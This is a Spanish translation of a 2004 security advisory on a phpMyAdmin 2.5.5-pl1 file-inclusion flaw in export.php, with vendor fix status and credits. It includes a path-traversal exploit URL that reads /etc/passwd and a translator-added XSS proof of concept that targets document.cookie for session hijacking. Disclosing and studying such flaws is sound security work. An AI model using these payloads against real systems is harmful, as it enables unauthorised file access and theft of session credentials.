Una falla ha sido descubierta por la gente de netVigilance (www.netvigilance.com) en la version 2.5.5-pl1 y anteriores de phpMyAdmin, la cual permite el acceso arbitrario a archivos del servidor.
Introduccion:
phpMyAdmin es una herramienta escrita en PHP que permite el manejo y la administración de MySQL sobre WWW. Hay una vulnerabilidad en la versión estable actual del phpMyAdmin que permite que un atacante recupere archivos arbitrarios del webserver con los privilegios del mismo.
Detalles:
El archivo export puede ser explotado para mostrar archivos de forma arbitraria utilizando una llamada a la funcion PHP include().
Sistemas Vulnerables:
* phpMyAdmin 2.5.5-pl1 y anteriores
Fecha de lanzamiento:
2 de Febrero de 2004
Severidad:
ALTA
Ejemplo:
I – Acceso Arbitrario al Archivo
(Riesgo ALTO)
Archivo Afectado: export.php
14:// ¿Qué tipo de exportación estamos haciendo?
15:if ($what == ‘excel’) {
16: $type = ‘csv’;
17:} else {
18: $type = $what;
19:}
20:
21:/**
22: * Define el URL para volver a en caso de error en una declaración del sql
23: */
24:require(‘./libraries/export/’ . $type . ‘.php’);
Ejemplo de Explotacion:
- — HTTP Request –
http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00
- — HTTP Request –
Esta falla esta disponible siempre y cuando PHP register_globals este configurado en off.
Estado del Vendedor:
La información se ha proporcionado a los encargados de proyecto de phpMyAdmin. Una nueva version del 2.5.6-rc1 saldra con los arreglos para esta vulnerabilidad.
- –>
http://www.phpmyadmin.net/home_page/
- –>
http://www.phpmyadmin.net/home_page/relnotes.php?rel=0
Creditos:
Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
[cco netvigilance com]
Articulo Original:
http://www.securityfocus.com/archive/1/352378
Traduccion por Martin [Xyborg] Aberastegue
Cross Site Scripting (XSS) por Xyborg:
Por nuestra parte hemos seguido investigando esta falla y no hemos dado cuenta de que tambien es posible insertar codigo de forma arbitraria en el mismo archivos para su posterior ejecucion, lo que supone un peligro tambien ya que permitiria el secuestro de sesiones utilizando un simple codigo JavaScript.
Explotacion:
http://[target]/[phpMyAdmin_directory]/export.php?what=<script>alert(document.cookie);</script>
Eso es por dar una prueba de que el XSS es posibe.
Aunque solo podria llevarse a cabo teniendo una cuenta que no diera acceso a dicho script (phpMyAdmin), tambien se podria hacer que mediante ingenieria social alguna victima ejecutara algun tipo de codigo que no permitiera capturar el contenido de su Cookie, para asi obtener acceso a su panel de control.
Por Martin [Xyborg] Aberastegue
Publicidad